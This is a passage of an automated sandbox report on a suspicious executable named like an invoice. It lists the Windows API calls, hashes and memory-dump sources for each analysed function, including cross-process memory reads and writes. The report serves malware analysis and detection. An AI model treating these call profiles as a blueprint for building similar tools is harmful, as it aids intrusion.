                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 47921759-0
                                                                                                                • Opcode ID: e1be864ee5d6127e1a108872069edc7c612963005cd5e59dc2e2c1ddbae351b6
                                                                                                                • Instruction ID: d62faf2db930853888a72a0625368dd34abf4f90e26c71bef11078f39c34bb13
                                                                                                                • Opcode Fuzzy Hash: e1be864ee5d6127e1a108872069edc7c612963005cd5e59dc2e2c1ddbae351b6
                                                                                                                • Instruction Fuzzy Hash: AAF08C792402187FEB105FA4EC88FA73BBCFB49758B00441EF941C6290DA669C19DA71
                                                                                                                APIs
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 004CAADA
                                                                                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 004CAAE4
                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004CAAF3
                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 004CAAFA
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004CAB10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 47921759-0
                                                                                                                • Opcode ID: 65ba0a1376152741576ef249823e95f1909078a07d7908812d95da4b8dbee962
                                                                                                                • Instruction ID: a280801d31d9aa0ca6cead3b4396b77b7be79785e56641544bc0b70f0cf93242
                                                                                                                • Opcode Fuzzy Hash: 65ba0a1376152741576ef249823e95f1909078a07d7908812d95da4b8dbee962
                                                                                                                • Instruction Fuzzy Hash: 43F08C792402186FEB111FA4EC8CFA73B7DFB49758F00402AFA41C7290EA65AC15DA71
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 004CEC94
                                                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 004CECAB
                                                                                                                • MessageBeep.USER32(00000000), ref: 004CECC3
                                                                                                                • KillTimer.USER32(?,0000040A), ref: 004CECDF
                                                                                                                • EndDialog.USER32(?,00000001), ref: 004CECF9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3741023627-0
                                                                                                                • Opcode ID: 139c32eeca6f955b5cba6bf4a6a69d33f1bd8bf03e78ef6fb7ab12255cd6d7de
                                                                                                                • Instruction ID: 0e4eddfb041160b85ac878d62e82ed90ccdaf8f549220e5181a3cef2c09b8f30
                                                                                                                • Opcode Fuzzy Hash: 139c32eeca6f955b5cba6bf4a6a69d33f1bd8bf03e78ef6fb7ab12255cd6d7de
                                                                                                                • Instruction Fuzzy Hash: F9018134500714ABEB255B11DE5EFD6BBB8FB20705F00455EB583A24E0DBF8AA48DB54
                                                                                                                APIs
                                                                                                                • EndPath.GDI32(?), ref: 004AB0BA
                                                                                                                • StrokeAndFillPath.GDI32(?,?,0050E680,00000000,?,?,?), ref: 004AB0D6
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 004AB0E9
                                                                                                                • DeleteObject.GDI32 ref: 004AB0FC
                                                                                                                • StrokePath.GDI32(?), ref: 004AB117
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                • String ID:
                                                                                                                • API String ID: 2625713937-0
                                                                                                                • Opcode ID: 357c78596fdb6231214f31718593ac98b5259625ace6fe9161f4cb03095eb4ca
                                                                                                                • Instruction ID: 94be6d3d1b19f80334b796c2b80eae8c187590a2be7f09b99f72af334524976f
                                                                                                                • Opcode Fuzzy Hash: 357c78596fdb6231214f31718593ac98b5259625ace6fe9161f4cb03095eb4ca
                                                                                                                • Instruction Fuzzy Hash: C7F0F634004A08AFCB219FA5EC2C7963F64E7313A2F088319E429445F2C738895AEF68
                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000), ref: 004DF2DA
                                                                                                                • CoCreateInstance.COMBASE(0051DA7C,00000000,00000001,0051D8EC,?), ref: 004DF2F2
                                                                                                                • CoUninitialize.COMBASE ref: 004DF555
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateInitializeInstanceUninitialize
                                                                                                                • String ID: .lnk
                                                                                                                • API String ID: 948891078-24824748
                                                                                                                • Opcode ID: 13ecbc2ef45701487fc046e7f5db5510ea7fd3e81dc97faa5eb678ff95eca3a1
                                                                                                                • Instruction ID: 50f9a927f1f2449268f543df13743406054041cd10463bd2f5c1628eac39b733
                                                                                                                • Opcode Fuzzy Hash: 13ecbc2ef45701487fc046e7f5db5510ea7fd3e81dc97faa5eb678ff95eca3a1
                                                                                                                • Instruction Fuzzy Hash: 28A18F71104201AFD700EF65C891DAFB7ECEF98718F00492EF15597292EB74E909CBA6
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0049660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004953B1,?,?,004961FF,?,00000000,00000001,00000000), ref: 0049662F
                                                                                                                • CoInitialize.OLE32(00000000), ref: 004DE85D
                                                                                                                • CoCreateInstance.COMBASE(0051DA7C,00000000,00000001,0051D8EC,?), ref: 004DE876
                                                                                                                • CoUninitialize.COMBASE ref: 004DE893
                                                                                                                  • Part of subcall function 0049936C: __swprintf.LIBCMT ref: 004993AB
                                                                                                                  • Part of subcall function 0049936C: __itow.LIBCMT ref: 004993DF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                • String ID: .lnk
                                                                                                                • API String ID: 2126378814-24824748
                                                                                                                • Opcode ID: 552f0e82a3a65f0dec9151d86538fc7a938d33285ee80fdbbe206785d618d3aa
                                                                                                                • Instruction ID: aa6c0cc542f580b7980e1e02088ab3c0ddac37d9506d2381d9eb867e2d487e55
                                                                                                                • Opcode Fuzzy Hash: 552f0e82a3a65f0dec9151d86538fc7a938d33285ee80fdbbe206785d618d3aa
                                                                                                                • Instruction Fuzzy Hash: 20A186756043019FCB10EF25C49491ABBE5BF88314F00899EF9969B3A1CB36EC45CB95
                                                                                                                APIs
                                                                                                                • __startOneArgErrorHandling.LIBCMT ref: 004B32ED
                                                                                                                  • Part of subcall function 004BE0D0: __87except.LIBCMT ref: 004BE10B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorHandling__87except__start
                                                                                                                • String ID: pow
                                                                                                                • API String ID: 2905807303-2276729525
                                                                                                                • Opcode ID: 8df2f0996c47be33204c42f2af5000c817e6a3143f938f8e4a4b9a5f78e53471
                                                                                                                • Instruction ID: a14b14e1efc5313b52dca9d2ec68c1129884158140b87927b73bf92a9b66e928
                                                                                                                • Opcode Fuzzy Hash: 8df2f0996c47be33204c42f2af5000c817e6a3143f938f8e4a4b9a5f78e53471
                                                                                                                • Instruction Fuzzy Hash: 72515D2190820196CB196F1BC9413FB2BD49B91711F304D6BF485813D5DE3CCDD9A67E
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0052DC50,?,0000000F,0000000C,00000016,0052DC50,?), ref: 004D4645
                                                                                                                  • Part of subcall function 0049936C: __swprintf.LIBCMT ref: 004993AB
                                                                                                                  • Part of subcall function 0049936C: __itow.LIBCMT ref: 004993DF
                                                                                                                • CharUpperBuffW.USER32(?,?,00000000,?), ref: 004D46C5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharUpper$__itow__swprintf
                                                                                                                • String ID: REMOVE$THIS
                                                                                                                • API String ID: 3797816924-776492005
                                                                                                                • Opcode ID: bac1b808a5b83c7c8d4c3938ad18264980544ba4ce5193725301846a86864702
                                                                                                                • Instruction ID: c618cec2743226db50fe124f9a9edcb6d1342f77aa2eda3fc20e18a7929bae27
                                                                                                                • Opcode Fuzzy Hash: bac1b808a5b83c7c8d4c3938ad18264980544ba4ce5193725301846a86864702
                                                                                                                • Instruction Fuzzy Hash: B8416434A002199FCF00EF65C895AAEB7B5FF89308F14806BE916AB352D739DD45CB54
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004D430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004CBC08,?,?,00000034,00000800,?,00000034), ref: 004D4335
                                                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004CC1D3
                                                                                                                  • Part of subcall function 004D42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004CBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 004D4300
                                                                                                                  • Part of subcall function 004D422F: GetWindowThreadProcessId.USER32(?,?), ref: 004D425A
                                                                                                                  • Part of subcall function 004D422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,004CBBCC,00000034,?,?,00001004,00000000,00000000), ref: 004D426A
                                                                                                                  • Part of subcall function 004D422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,004CBBCC,00000034,?,?,00001004,00000000,00000000), ref: 004D4280
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004CC240
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004CC28D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                • String ID: @
                                                                                                                • API String ID: 4150878124-2766056989
                                                                                                                • Opcode ID: 1e1cbaae6865226d74b39aa6da6b1e8337e9ce6f8e1d58cee64795ac687b8772
                                                                                                                • Instruction ID: 7b89bef538c486f23dd7bbf090b8dc5373320672acbe09402d10f633cdbdf964
                                                                                                                • Opcode Fuzzy Hash: 1e1cbaae6865226d74b39aa6da6b1e8337e9ce6f8e1d58cee64795ac687b8772
                                                                                                                • Instruction Fuzzy Hash: 46415C76A00218BFDB10DFA4CC91EEEB7B8AF49304F04409AFA45B7281DA756E45CB65
                                                                                                                APIs
                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0052DC00,00000000,?,?,?,?), ref: 004FA6D8
                                                                                                                • GetWindowLongW.USER32 ref: 004FA6F5
                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004FA705
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Long
                                                                                                                • String ID: SysTreeView32
                                                                                                                • API String ID: 847901565-1698111956
                                                                                                                • Opcode ID: 5aeaacb2bd2bcf7665f055c220aebebf54874a6ebde98cba192449837a8e3185
                                                                                                                • Instruction ID: 86e4ad22bbbcc6a72e4270f0902b47033581123dcb2182c6914bf472989822f0
                                                                                                                • Opcode Fuzzy Hash: 5aeaacb2bd2bcf7665f055c220aebebf54874a6ebde98cba192449837a8e3185
                                                                                                                • Instruction Fuzzy Hash: C1319171100209ABDB119F34CC41BE77BA9FB49324F144716F979922E0C774E8609B59
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 004E5190
                                                                                                                • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 004E51C6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CrackInternet_memset
                                                                                                                • String ID: |$DN
                                                                                                                • API String ID: 1413715105-234596118
                                                                                                                • Opcode ID: dff3c3feedc673703d64e0361a1e4bcc87cb6abadf71daffbdd27e365da7e734
                                                                                                                • Instruction ID: c1250f8ddf435400251095061e7fcc7d6dc9a0826af5796fcffef230ab8c3b65
                                                                                                                • Opcode Fuzzy Hash: dff3c3feedc673703d64e0361a1e4bcc87cb6abadf71daffbdd27e365da7e734
                                                                                                                • Instruction Fuzzy Hash: FB313D71C00119ABCF01EFA5CC85AEE7FB9FF14708F00406AF915A6165DB35A916DBA4
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 004FA15E
                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 004FA172
                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 004FA196
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window
                                                                                                                • String ID: SysMonthCal32
                                                                                                                • API String ID: 2326795674-1439706946
                                                                                                                • Opcode ID: de6a86baed71376793b50dc6fcf0ccd3731960b1d91b6b802bacfd55392ab133
                                                                                                                • Instruction ID: 1f6ea34ef9b25c10f2e2eea77518e97575cae7ef34f9e0e6d54df0293eb3a2c1
                                                                                                                • Opcode Fuzzy Hash: de6a86baed71376793b50dc6fcf0ccd3731960b1d91b6b802bacfd55392ab133
                                                                                                                • Instruction Fuzzy Hash: CC21BF72500218ABDF118F94CC82FEA3B79FF48714F110215FA596B1D0D6B9AC65DBA4
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 004FA941
                                                                                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 004FA94F
                                                                                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 004FA956
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$DestroyWindow
                                                                                                                • String ID: msctls_updown32
                                                                                                                • API String ID: 4014797782-2298589950
                                                                                                                • Opcode ID: c9fcd262702046a1f56d44451893db972239f7a086f167c3c8ee2137ae7930d2
                                                                                                                • Instruction ID: d72b220e0ba1e8f85711a77499709da83388e35b94cd688527889c8e698163b1
                                                                                                                • Opcode Fuzzy Hash: c9fcd262702046a1f56d44451893db972239f7a086f167c3c8ee2137ae7930d2
                                                                                                                • Instruction Fuzzy Hash: 9021AEF5600609AFDB10DF18CC91DB73BACEB5A3A8B05045AFA089B361CA74EC119B65
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 004F9A30
                                                                                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 004F9A40
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 004F9A65
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$MoveWindow
                                                                                                                • String ID: Listbox
                                                                                                                • API String ID: 3315199576-2633736733
                                                                                                                • Opcode ID: 1e49acd2737ae4da4ba3ba57a9da40e3450477ee8e875f93279c89363748f1f6
                                                                                                                • Instruction ID: 40ab744f8003e8510c0c55b29ef989dd469eb7ee3068c39e26617d203951e2cd
                                                                                                                • Opcode Fuzzy Hash: 1e49acd2737ae4da4ba3ba57a9da40e3450477ee8e875f93279c89363748f1f6
                                                                                                                • Instruction Fuzzy Hash: B521C57261011CBFDF218F54CC85FBB3BAAEF89754F01812AFA44572A0C6759C519BA4
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 004FA46D
